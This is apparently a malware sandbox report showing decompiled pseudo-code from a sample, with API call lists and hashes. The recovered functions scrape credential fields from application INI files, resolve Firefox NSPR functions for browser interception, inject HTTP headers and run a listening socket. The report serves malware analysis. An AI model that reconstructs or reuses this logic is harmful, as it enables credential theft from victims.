            				_t101 = __ecx;
            				E004104CB( &_v12,  &_v12, 0, 8);
            				_t47 = 0x41;
            				E0040F369(_t47,  &_v260);
            				_t49 = 0x42;
            				E0040F369(_t49,  &_v116);
            				_t104 =  &_v780;
            				_t54 = E004143B6(0x80000001, 0x104, _t101, _t104,  &_v260,  &_v116);
            				if(_t54 != 0xffffffff && _t54 > 0) {
            					ExpandEnvironmentStringsW(_t104,  &_v1300, 0x104);
            					E00408100(_t103,  &_v1300,  &_v12);
            					PathRemoveFileSpecW( &_v1300);
            				}
            				_t105 = 0;
            				if(_v8 != 0) {
            					L14:
            					_t129 = _v8;
            					L15:
            					if(_t129 > 0) {
            						_t109 =  &_v72;
            						_t56 = 0x47;
            						E0040F369(_t56,  &_v72);
            						E0040D929( &_v72, _v12, _t103, _t129, _t109);
            					}
            					return E00410418(_v12);
            				}
            				_t60 = 0x44;
            				E0040F369(_t60,  &_v64);
            				_t62 = 0x45;
            				E0040F369(_t62,  &_v160);
            				_t112 =  &_v92;
            				_t64 = 0x46;
            				E0040F369(_t64, _t112);
            				_v24 =  &_v64;
            				_v20 =  &_v160;
            				_v40 = 0x24;
            				_v36 = 0x1a;
            				_v32 = 0x26;
            				_v28 = 0x23;
            				_v16 = _t112;
            				do {
            					_t113 =  *((intOrPtr*)(_t116 + _t105 * 4 - 0x24));
            					__imp__SHGetFolderPathW(0, _t113, 0, 0,  &_v780);
            					if(0 == 0) {
            						_t122 = _t113 - 0x24;
            						if(_t113 == 0x24) {
            							E004080BE(_t122,  &_v780,  &_v12, 0);
            							_v774 = 0;
            						}
            						_t103 =  &_v24;
            						_t101 =  &_v780;
            						E00415BE8( &_v780,  &_v24, 0, 3, 2, E004082B9,  &_v12, 0, 0, 0);
            					}
            					_t105 = _t105 + 1;
            				} while (_t105 < 4);
            				if(_v8 != 0) {
            					goto L15;
            				}
            				_t71 = 0x41;
            				E0040F369(_t71,  &_v188);
            				_t73 = 0x43;
            				E0040F369(_t73,  &_v64);
            				_t106 =  &_v780;
            				_t78 = E004143B6(0x80000001, 0x104, _t101, _t106,  &_v188,  &_v64);
            				if(_t78 != 0xffffffff) {
            					_t128 = _t78;
            					if(_t78 > 0) {
            						ExpandEnvironmentStringsW(_t106,  &_v1300, 0x104);
            						E004080BE(_t128,  &_v1300,  &_v12, 1);
            					}
            				}
            				goto L14;
            			}

            APIs
              • Part of subcall function 004143B6: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,?,0040F571,?,00000017,.exe,00000000,00000000), ref: 004143C9
            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000003,00000000,00000008,?,?,00000001), ref: 00408367
              • Part of subcall function 00408100: HeapAlloc.KERNEL32(00000008,00020002,?,?,00000104), ref: 0040811F
              • Part of subcall function 00408100: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00408140
              • Part of subcall function 00408100: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 0040816A
              • Part of subcall function 00408100: StrStrIW.SHLWAPI(00000001,?), ref: 004081D6
              • Part of subcall function 00408100: StrStrIW.SHLWAPI(00000001,?), ref: 004081E7
              • Part of subcall function 00408100: GetPrivateProfileStringW.KERNEL32(00000001,?,00000000,?,000000FF,?), ref: 00408203
              • Part of subcall function 00408100: GetPrivateProfileStringW.KERNEL32(00000001,?,00000000,?,000000FF,?), ref: 00408221
            • PathRemoveFileSpecW.SHLWAPI(?,?,00000003,?,?,00000001), ref: 00408384
            • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,?,00000003,00000000,00000008,?,?,00000001), ref: 004083FA
            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,?,00000001), ref: 00408496
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: PrivateProfileString$AllocEnvironmentExpandHeapPathStrings$FileFolderOpenRemoveSpec
            • String ID: #$$$&
            • API String ID: 2372788633-1941049543
            • Opcode ID: 0b83daaa94d2b68bc5978299d3d86b67dd8bdab18afb4862d94cef60be476bbf
            • Instruction ID: 6584ba56b05fd5600762627c01845f20b3b2c60ae91a180fac9c893d6b8f01b3
            • Opcode Fuzzy Hash: 0b83daaa94d2b68bc5978299d3d86b67dd8bdab18afb4862d94cef60be476bbf
            • Instruction Fuzzy Hash: E9513F72E00218AADF20DBB1CD45BDE77BCAB04714F00447BB658F7181EB789B898B95
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0040A754(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
            				_Unknown_base(*)()* _t12;
            				struct HINSTANCE__* _t14;
            
            				 *0x41aa0c =  *0x41aa0c & 0x00000000;
            				 *0x41aa10 =  *0x41aa10 & 0x00000000;
            				_t14 = __eax;
            				InitializeCriticalSection(0x41a9f0);
            				 *0x41aa08 = _a4;
            				 *0x41a9e4 = _a8;
            				 *0x41aa14 = _a12;
            				 *0x41a9e8 = _t14;
            				 *0x41a9e0 = _a16;
            				 *0x41a9dc = GetProcAddress(_t14, "PR_GetNameForIdentity");
            				 *0x41a9ec = GetProcAddress( *0x41a9e8, "PR_SetError");
            				_t12 = GetProcAddress( *0x41a9e8, "PR_GetError");
            				 *0x41a8ec = _t12;
            				return _t12;
            			}

            APIs
            • InitializeCriticalSection.KERNEL32(0041A9F0,761B4EE0,00406556,0041A140,00000000,?,00000000,00000000), ref: 0040A76A
            • GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0040A7A6
            • GetProcAddress.KERNEL32(PR_SetError), ref: 0040A7B8
            • GetProcAddress.KERNEL32(PR_GetError), ref: 0040A7CA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AddressProc$CriticalInitializeSection
            • String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
            • API String ID: 2804437462-2578621715
            • Opcode ID: a20470ef866b08492ba3aa275ae2d17028f15ac541d8cb6d0b27057fa8fd289f
            • Instruction ID: 06e3b6302f31b1b7b71ecd45e9b6986731216e7eaace2c9a2fd35ff310fb9603
            • Opcode Fuzzy Hash: a20470ef866b08492ba3aa275ae2d17028f15ac541d8cb6d0b27057fa8fd289f
            • Instruction Fuzzy Hash: FA01FBF4A133509FC310CF65ED096963FE0EB48360B01C83BA444A32B2D37854A0CF8A
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 94%
            			E0040850F(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
            				short _v524;
            				short _v528;
            				char _v568;
            				short _v584;
            				char _v596;
            				short _v600;
            				char _v608;
            				short _v612;
            				char _v616;
            				short _v620;
            				char _v624;
            				short _v628;
            				int _v632;
            				WCHAR* _v636;
            				WCHAR* _v640;
            				WCHAR* _v644;
            				WCHAR* _v648;
            				WCHAR* _v652;
            				WCHAR* _v656;
            				WCHAR* _v660;
            				void* __edi;
            				void* __esi;
            				WCHAR* _t56;
            				WCHAR* _t59;
            				short* _t61;
            				WCHAR* _t62;
            				void* _t63;
            				void* _t65;
            				void* _t67;
            				void* _t69;
            				void* _t71;
            				WCHAR* _t74;
            				WCHAR* _t75;
            				long _t79;
            				int _t82;
            				WCHAR* _t85;
            				long _t87;
            				long _t90;
            				WCHAR* _t91;
            				void* _t92;
            				WCHAR* _t95;
            				WCHAR* _t96;
            				WCHAR* _t114;
            				WCHAR* _t119;
            				intOrPtr _t127;
            				signed int _t128;
            				void* _t130;
            
            				_t130 = (_t128 & 0xfffffff8) - 0x28c;
            				if(E00415D45( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
            					L21:
            					return 1;
            				}
            				_t133 =  *__edx & 0x00000010;
            				if(( *__edx & 0x00000010) == 0) {
            					_t119 = HeapAlloc( *0x41bc68, 8, 0x20002);
            					_v640 = _t119;
            					__eflags = _t119;
            					if(_t119 == 0) {
            						goto L21;
            					}
            					_t56 = GetPrivateProfileStringW(0, 0, 0, _t119, 0xffff,  &_v524);
            					__eflags = _t56;
            					if(_t56 <= 0) {
            						L20:
            						E00410418(_t119);
            						goto L21;
            					}
            					_t9 =  &(_t56[0]); // 0x1
            					_t59 = E0041131B(_t119, _t9);
            					__eflags = _t59;
            					if(_t59 == 0) {
            						goto L20;
            					}
            					_t114 = HeapAlloc( *0x41bc68, 8, 0xc20);
            					_v644 = _t114;
            					__eflags = _t114;
            					if(_t114 != 0) {
            						_t11 =  &(_t114[0x1fe]); // 0x3fc
            						_t61 = _t11;
            						_v648 = _t61;
            						_t62 =  &(_t61[0xff]);
            						__eflags = _t62;
            						_v636 = _t62;
            						_v652 = _t119;
            						_t63 = 0x49;
            						E0040F369(_t63,  &_v584);
            						_t65 = 0x4a;
            						E0040F369(_t65,  &_v596);
            						_t67 = 0x4b;
            						E0040F369(_t67,  &_v608);
            						_t69 = 0x4c;
            						E0040F369(_t69,  &_v616);
            						_t71 = 0x4d;
            						E0040F369(_t71,  &_v624);
            						do {
            							_t74 = StrStrIW(_v652,  &_v584);
            							__eflags = _t74;
            							if(_t74 == 0) {
            								_t79 = GetPrivateProfileStringW(_v656,  &_v600, 0, _t114, 0xff,  &_v528);
            								__eflags = _t79;
            								if(_t79 > 0) {
            									_t82 = GetPrivateProfileIntW(_v656,  &_v612, 0x15,  &_v528);
            									_v632 = _t82;
            									__eflags = _t82 - 1 - 0xfffe;
            									if(_t82 - 1 <= 0xfffe) {
            										_t30 =  &(_t114[0xff]); // 0x1fe
            										_t85 = _t30;
            										_v636 = _t85;
            										_t87 = GetPrivateProfileStringW(_v656,  &_v620, 0, _t85, 0xff,  &_v528);
            										__eflags = _t87;
            										if(_t87 > 0) {
            											_t90 = GetPrivateProfileStringW(_v656,  &_v628, 0, _v652, 0xff,  &_v528);
            											__eflags = _t90;
            											if(_t90 > 0) {
            												_t91 = E00411098(_v652);
            												__eflags = _t91;
            												if(_t91 > 0) {
            													_t126 =  &_v568;
            													_t92 = 0x2c;
            													E0040F369(_t92,  &_v568);
            													_push(_v632);
            													_push(_t114);
            													_push(_v652);
            													_t115 = _v640;
            													_push(_v636);
            													_t95 = E004111A5(_t126, 0x311, _v640, _t126);
            													_t130 = _t130 + 0x14;
            													__eflags = _t95;
            													if(_t95 > 0) {
            														_t127 = _a4;
            														_t96 = E00410818(_t95, _t127, _t115);
            														__eflags = _t96;
            														if(_t96 != 0) {
            															_t45 = _t127 + 4;
            															 *_t45 =  &(( *(_t127 + 4))[0]);
            															__eflags =  *_t45;
            														}
            													}
            													_t114 = _v648;
            												}
            											}
            										}
            									}
            								}
            							}
            							_t75 = E00411359(_v656, 1);
            							_v660 = _t75;
            							__eflags = _t75;
            						} while (_t75 != 0);
            						E00410418(_t114);
            						_t119 = _v648;
            					}
            					goto L20;
            				} else {
            					E004084D7(_t133,  &_v524, _a4);
            					goto L21;
            				}
            			}

            APIs
              • Part of subcall function 00415D45: PathCombineW.SHLWAPI(?,?,004014A8,004038F5,?,?,?,00000000), ref: 00415D65
            • HeapAlloc.KERNEL32(00000008,00020002,?), ref: 00408566
            • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040858F
            • HeapAlloc.KERNEL32(00000008,00000C20), ref: 004085B8
            • StrStrIW.SHLWAPI(?,?), ref: 00408624
            • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 0040864C
            • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00408669
            • GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 0040869E
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: PrivateProfile$String$AllocHeap$CombinePath
            • String ID:
            • API String ID: 3432043379-0
            • Opcode ID: 93e4f6491013904f4b9aa8ec7a0e358a635758e752a0db93495e68b2a8f995dc
            • Instruction ID: bbb8931d5b34c0e664ac83ce98ae93ef364f7b5f13b77b3723d65bc5b59c2e45
            • Opcode Fuzzy Hash: 93e4f6491013904f4b9aa8ec7a0e358a635758e752a0db93495e68b2a8f995dc
            • Instruction Fuzzy Hash: 75519172504306AED720DB65CD41FABB7E8EF84754F10083EBA84F3291DB38D9458796
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0040C7FC(void* __ecx, void* __edx, void* __eflags, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
            				intOrPtr _v16;
            				signed char* _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				intOrPtr _v32;
            				char _v60;
            				intOrPtr _v64;
            				intOrPtr _v68;
            				intOrPtr _v72;
            				intOrPtr _v76;
            				char _v88;
            				signed int _v100;
            				signed int _v104;
            				signed int _v108;
            				signed int _v109;
            				char _v112;
            				char _v120;
            				intOrPtr _v156;
            				char _v157;
            				signed int _v160;
            				intOrPtr _v164;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				signed char _t83;
            				signed int _t86;
            				intOrPtr _t87;
            				void* _t90;
            				void* _t94;
            				void* _t98;
            				signed int _t105;
            				intOrPtr _t106;
            				intOrPtr _t110;
            				intOrPtr _t112;
            				intOrPtr _t113;
            				intOrPtr _t114;
            				intOrPtr _t115;
            				intOrPtr _t116;
            				intOrPtr _t117;
            				signed char* _t118;
            				signed int _t119;
            				struct _CRITICAL_SECTION* _t125;
            				intOrPtr _t130;
            				char* _t138;
            				char* _t139;
            				char* _t140;
            				signed int _t142;
            				signed int _t148;
            
            				_v104 = _v104 | 0xffffffff;
            				_t121 =  &_v60;
            				if(E0040C72B( &_v60, __ecx, __eflags, _a4,  *_a8,  *_a12) == 0) {
            					L23:
            					E00407754( &_v60);
            					return _v104;
            				}
            				_t83 = E00406ECA(__edx, _t121);
            				_v104 = _t83;
            				if((1 & _t83) == 0) {
            					__eflags = _t83 & 0x00000002;
            					if((_t83 & 0x00000002) == 0) {
            						_t125 = 0x41aa60;
            						L18:
            						__eflags = _v100 & 0x00000004;
            						if((_v100 & 0x00000004) == 0) {
            							goto L23;
            						}
            						 *_a8 = _v28;
            						 *_a12 = _v24;
            						EnterCriticalSection(_t125);
            						_t146 = _a4;
            						_t86 = E0040BDA6(_a4);
            						__eflags = _t86 - 0xffffffff;
            						if(_t86 != 0xffffffff) {
            							L21:
            							_t87 =  *0x41aa78; // 0x0
            							_t148 = _t86 * 0x24;
            							__eflags = _t148;
            							E00410418( *((intOrPtr*)(_t148 + _t87 + 8)));
            							_t130 =  *0x41aa78; // 0x0
            							 *((intOrPtr*)(_t148 + _t130 + 8)) = _v32;
            							L22:
            							LeaveCriticalSection(_t125);
            							goto L23;
            						}
            						_t86 = E0040BDCC(_t86, _t146);
            						__eflags = _t86 - 0xffffffff;
            						if(_t86 == 0xffffffff) {
            							goto L22;
            						}
            						goto L21;
            					}
            					_v108 = _v108 & 0x00000000;
            					_v109 = 1;
            					__eflags = _v16 - 1;
            					if(_v16 != 1) {
            						L9:
            						_t138 =  &_v88;
            						_t90 = 0x20;
            						E0040F333(_t90, _t138);
            						HttpAddRequestHeadersA(_a4, _t138, 0xffffffff, 0xa0000000);
            						_t139 =  &_v112;
            						_t94 = 0x21;
            						E0040F333(_t94, _t139);
            						HttpAddRequestHeadersA(_a4, _t139, 0xffffffff, 0x80000000);
            						_t140 =  &_v120;
            						_t98 = 0x22;
            						E0040F333(_t98, _t140);
            						HttpAddRequestHeadersA(_a4, _t140, 0xffffffff, 0x80000000);
            						L10:
            						_t125 = 0x41aa60;
            						EnterCriticalSection(0x41aa60);
            						__eflags = _v157;
            						if(_v157 == 0) {
            							L14:
            							E004077A6(_v64, _v68);
            							__eflags = _v160;
            							if(_v160 != 0) {
            								E00411F0E(_v156);
            							}
            							L16:
            							LeaveCriticalSection(_t125);
            							goto L18;
            						}
            						_t150 = _a4;
            						_t105 = E0040BDA6(_a4);
            						__eflags = _t105 - 0xffffffff;
            						if(_t105 != 0xffffffff) {
            							L13:
            							_t106 =  *0x41aa78; // 0x0
            							_t142 = _t105 * 0x24;
            							E004077A6( *((intOrPtr*)(_t106 + _t142 + 0x10)),  *((intOrPtr*)(_t106 + _t142 + 0xc)));
            							_t110 =  *0x41aa78; // 0x0
            							E00410418( *((intOrPtr*)(_t142 + _t110 + 0x14)));
            							_t112 =  *0x41aa78; // 0x0
            							 *(_t142 + _t112 + 0x14) =  *(_t142 + _t112 + 0x14) & 0x00000000;
            							_t113 =  *0x41aa78; // 0x0
            							 *(_t142 + _t113 + 0x1c) =  *(_t142 + _t113 + 0x1c) & 0x00000000;
            							_t114 =  *0x41aa78; // 0x0
            							 *(_t142 + _t114 + 0x18) =  *(_t142 + _t114 + 0x18) | 0xffffffff;
            							_t115 =  *0x41aa78; // 0x0
            							 *((intOrPtr*)(_t142 + _t115 + 0xc)) = _v76;
            							_t116 =  *0x41aa78; // 0x0
            							 *((intOrPtr*)(_t142 + _t116 + 0x10)) = _v72;
            							_t117 =  *0x41aa78; // 0x0
            							 *((intOrPtr*)(_t142 + _t117 + 0x20)) = _v164;
            							goto L16;
            						}
            						_t105 = E0040BDCC(_t105, _t150);
            						__eflags = _t105 - 0xffffffff;
            						if(_t105 == 0xffffffff) {
            							goto L14;
            						}
            						goto L13;
            					}
            					_t118 = _v20;
            					__eflags =  *_t118 & 0x00000003;
            					if(( *_t118 & 0x00000003) == 0) {
            						goto L9;
            					}
            					_t119 = E00407A04(_t118,  &_v60);
            					_v108 = _t119;
            					__eflags = _t119;
            					if(_t119 != 0) {
            						_v104 = 1;
            					} else {
            						_v109 = _t119;
            					}
            					goto L10;
            				} else {
            					SetLastError(0x2f78);
            					_v104 = _v104 & 0x00000000;
            					goto L23;
            				}
            			}

            APIs
              • Part of subcall function 00406ECA: EnterCriticalSection.KERNEL32(0041A9BC), ref: 00406EE5
              • Part of subcall function 00406ECA: LeaveCriticalSection.KERNEL32(0041A9BC), ref: 00406F66
            • SetLastError.KERNEL32(00002F78), ref: 0040C843
            • EnterCriticalSection.KERNEL32(0041AA60), ref: 0040C8EA
            • LeaveCriticalSection.KERNEL32(0041AA60,?), ref: 0040C99D
            • EnterCriticalSection.KERNEL32(0041AA60), ref: 0040C9C4
            • LeaveCriticalSection.KERNEL32(0041AA60,?), ref: 0040CA04
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalSection$EnterLeave$ErrorLast
            • String ID:
            • API String ID: 486337731-0
            • Opcode ID: 9e8f8f973118ed20fc7b06bb4ea0734f163cdd2adf5dd79176d9074b62167420
            • Instruction ID: b7716c48ca11ba2bf9d44a5f05619e29c537168c829ee91d619ffa9734da9891
            • Opcode Fuzzy Hash: 9e8f8f973118ed20fc7b06bb4ea0734f163cdd2adf5dd79176d9074b62167420
            • Instruction Fuzzy Hash: BB51A071504341DBD711EF28CC85A9A7BA0EF85364F148B3AF854A72E1C338ED51CB8A
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 95%
            			E00408100(void* __edx, WCHAR* _a4, intOrPtr _a8) {
            				WCHAR* _v8;
            				WCHAR* _v12;
            				WCHAR* _v16;
            				short* _v20;
            				short _v32;
            				short _v48;
            				short _v68;
            				short _v88;
            				short _v112;
            				char _v144;
            				void* __edi;
            				void* __esi;
            				WCHAR* _t41;
            				long _t42;
            				void* _t50;
            				void* _t52;
            				void* _t54;
            				void* _t56;
            				void* _t58;
            				WCHAR* _t62;
            				WCHAR* _t65;
            				void* _t73;
            				void* _t77;
            				WCHAR* _t85;
            				WCHAR* _t86;
            				intOrPtr _t98;
            				void* _t99;
            
            				_t83 = __edx;
            				_t41 = HeapAlloc( *0x41bc68, 8, 0x20002);
            				_v16 = _t41;
            				if(_t41 == 0) {
            					return _t41;
            				}
            				_t42 = GetPrivateProfileStringW(0, 0, 0, _t41, 0xffff, _a4);
            				if(_t42 <= 0) {
            					L17:
            					return E00410418(_v16);
            				}
            				_t3 = _t42 + 1; // 0x1
            				if(E0041131B(_v16, _t3) == 0) {
            					goto L17;
            				}
            				_t85 = HeapAlloc( *0x41bc68, 8, 0xc0c);
            				_v12 = _t85;
            				if(_t85 == 0) {
            					goto L17;
            				} else {
            					_t6 =  &(_t85[0x1fe]); // 0x3fc
            					_v20 =  &(_t6[0xff]);
            					_v8 = _v16;
            					_t50 = 0x3c;
            					E0040F369(_t50,  &_v112);
            					_t52 = 0x3d;
            					E0040F369(_t52,  &_v48);
            					_t54 = 0x3e;
            					E0040F369(_t54,  &_v32);
            					_t56 = 0x3f;
            					E0040F369(_t56,  &_v88);
            					_t58 = 0x40;
            					E0040F369(_t58,  &_v68);
            					goto L6;
            					L15:
            					_t62 = E00411359(_v8, 1);
            					_v8 = _t62;
            					if(_t62 != 0) {
            						_t85 = _v12;
            						L6:
            						if(StrStrIW(_v8,  &_v112) == 0) {
            							_t65 = StrStrIW(_v8,  &_v48);
            							if(_t65 == 0 && GetPrivateProfileStringW(_v8,  &_v32, _t65, _t85, 0xff, _a4) > 0) {
            								_t86 =  &(_t85[0xff]);
            								if(GetPrivateProfileStringW(_v8,  &_v88, 0, _t86, 0xff, _a4) > 0) {
            									_t28 =  &(_t86[0xff]); // 0x0
            									_t96 = _t28;
            									if(GetPrivateProfileStringW(_v8,  &_v68, 0, _t28, 0xff, _a4) > 0 && E00407F94(_t83, _t96) > 0) {
            										_t97 =  &_v144;
            										_t73 = 0x2d;
            										E0040F369(_t73,  &_v144);
            										_push(_v12);
            										_t32 =  &(_t86[0xff]); // 0x0
            										_push(_t86);
            										_t87 = _v20;
            										_t83 = 0x307;
            										_t77 = E004111A5(_t97, 0x307, _v20, _t97);
            										_t99 = _t99 + 0x10;
            										if(_t77 > 0) {
            											_t98 = _a8;
            											if(E00410818(_t77, _t98, _t87) != 0) {
            												 *((intOrPtr*)(_t98 + 4)) =  *((intOrPtr*)(_t98 + 4)) + 1;
            											}
            										}
            									}
            								}
            							}
            						}
            						goto L15;
            					} else {
            						E00410418(_v12);
            						goto L17;
            					}
            				}
            			}

            APIs
            • HeapAlloc.KERNEL32(00000008,00020002,?,?,00000104), ref: 0040811F
            • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00408140
            • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 0040816A
            • StrStrIW.SHLWAPI(00000001,?), ref: 004081D6
            • StrStrIW.SHLWAPI(00000001,?), ref: 004081E7
            • GetPrivateProfileStringW.KERNEL32(00000001,?,00000000,?,000000FF,?), ref: 00408203
            • GetPrivateProfileStringW.KERNEL32(00000001,?,00000000,?,000000FF,?), ref: 00408221
            • GetPrivateProfileStringW.KERNEL32(00000001,?,00000000,?,000000FF,?), ref: 0040823B
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: PrivateProfileString$AllocHeap
            • String ID:
            • API String ID: 2479592106-0
            • Opcode ID: a50db90859ff1da6f4125af1de47ef46459538eb0afd7578374cbe7b4f4f7439
            • Instruction ID: 82136f4fb06a4c767ec4481982ff55a3112a3caf3568287c513a59a9e44dd443
            • Opcode Fuzzy Hash: a50db90859ff1da6f4125af1de47ef46459538eb0afd7578374cbe7b4f4f7439
            • Instruction Fuzzy Hash: 0B416E31D0061AFAEF10ABA5CD41EEEBB79EF44754F10407AE904F72A1DB389E458B94
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 82%
            			E0040F151(void* __ecx, void* __eflags) {
            				intOrPtr _v74;
            				signed int _v78;
            				char _v124;
            				char _v128;
            				long _v140;
            				void* _v144;
            				intOrPtr _v148;
            				void* _v152;
            				void* _v156;
            				void* _v160;
            				char _v164;
            				void* _v168;
            				signed int _v172;
            				long _v184;
            				void* __esi;
            				void* _t47;
            				long _t48;
            				void* _t49;
            				void* _t55;
            				long _t56;
            				long _t57;
            				long _t59;
            				intOrPtr _t64;
            				long _t65;
            				long _t69;
            				void* _t72;
            				long _t77;
            				signed int _t83;
            				intOrPtr* _t85;
            				signed int _t94;
            				long _t97;
            				signed int _t98;
            				void* _t100;
            
            				_t100 = (_t98 & 0xfffffff8) - 0xac;
            				_t83 = 2;
            				_t47 = E00403D00(__ecx, __eflags, 0x743c152e, _t83);
            				_v156 = _t47;
            				if(_t47 != 0) {
            					_t48 = E00403E39();
            					__eflags = _t48;
            					if(_t48 == 0) {
            						L26:
            						E00413A4E(_v148);
            						_t49 = 0;
            						__eflags = 0;
            						L27:
            						return _t49;
            					}
            					E004060A9(__ecx,  &_v124);
            					_t87 = _v78;
            					_t94 = E0040F007( &_v160, _v78,  &_v168) & 0x0000ffff;
            					__eflags = _t94;
            					if(_t94 != 0) {
            						L7:
            						__eflags = _t94 - _v74;
            						if(_t94 != _v74) {
            							E00406140( &_v124);
            							_v78 = _t94;
            							E00406198( &_v128);
            						}
            						_t55 =  *0x41a758; // 0x0
            						_v144 = _t55;
            						_t56 = _v152;
            						_v172 = 1;
            						__eflags = _t56;
            						if(_t56 != 0) {
            							_v140 = _t56;
            							_v172 = _t83;
            						}
            						_t57 = _v160;
            						__eflags = _t57;
            						if(_t57 != 0) {
            							_t87 = _v172;
            							_t20 =  &_v172;
            							 *_t20 = _v172 + 1;
            							__eflags =  *_t20;
            							 *(_t100 + 0x2c + _v172 * 4) = _t57;
            						}
            						_t59 = WaitForMultipleObjects(_v172,  &_v144, 0, 0xffffffff);
            						__eflags = _t59;
            						if(_t59 <= 0) {
            							L25:
            							E0041361F(_t59, _v156);
            							E0041361F(CloseHandle(_v152), _v164);
            							CloseHandle(_v160);
            							goto L26;
            						} else {
            							_t85 = __imp__#1;
            							while(1) {
            								__eflags = _t59 - _v172;
            								if(_t59 >= _v172) {
            									goto L25;
            								}
            								_t64 =  *((intOrPtr*)(_t100 + 0x2c + _t59 * 4));
            								__eflags = _t64 - _v152;
            								if(_t64 != _v152) {
            									__eflags = _t64 - _v160;
            									if(_t64 != _v160) {
            										while(1) {
            											L23:
            											_t65 =  *_t85(_v168, 0, 0);
            											_t97 = _t65;
            											__eflags = _t97 - 0xffffffff;
            											if(_t97 == 0xffffffff) {
            												break;
            											}
            											__imp__WSAEventSelect(_t97, 0, 0);
            											_v156 = 0;
            											__imp__WSAIoctl(_t97, 0x8004667e,  &_v156, 4, 0, 0,  &_v152, 0, 0);
            											E00413677(_t87, _t97);
            											_t69 = E00411E25(0x20000, E0040F084, _t97);
            											__eflags = _t69;
            											if(_t69 == 0) {
            												E0041361F(_t69, _t97);
            											}
            										}
            										_t59 = WaitForMultipleObjects(_v184,  &_v156, 0, _t65);
            										__eflags = _t59;
            										if(_t59 > 0) {
            											continue;
            										}
            										goto L25;
            									}
            									_t72 = _v164;
            									L20:
            									_v168 = _t72;
            									goto L23;
            								}
            								_t72 = _v156;
            								goto L20;
            							}
            							goto L25;
            						}
            					} else {
            						goto L4;
            					}
            					while(1) {
            						L4:
            						_t77 = WaitForSingleObject( *0x41a758, 0x3e8);
            						__eflags = _t77 - 0x102;
            						if(_t77 != 0x102) {
            							break;
            						}
            						_t87 = _v74;
            						_t94 = E0040F007( &_v156, _v74,  &_v164) & 0x0000ffff;
            						__eflags = _t94;
            						if(_t94 == 0) {
            							continue;
            						}
            						break;
            					}
            					__eflags = _t94;
            					if(_t94 == 0) {
            						goto L26;
            					}
            					goto L7;
            				}
            				_t49 = 1;
            				goto L27;
            			}

            APIs
              • Part of subcall function 00403D00: CreateMutexW.KERNEL32(0041A2C8,00000000,?,?,?,?,?), ref: 00403D21
            • WaitForSingleObject.KERNEL32(000003E8,?,?,743C152E,00000002), ref: 0040F1BC
            • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,743C152E), ref: 0040F24D
            • accept.WS2_32(?,00000000,00000000), ref: 0040F2D9
            • WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 0040F2ED
            • CloseHandle.KERNEL32(?), ref: 0040F30E
            • CloseHandle.KERNEL32(?), ref: 0040F31D
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
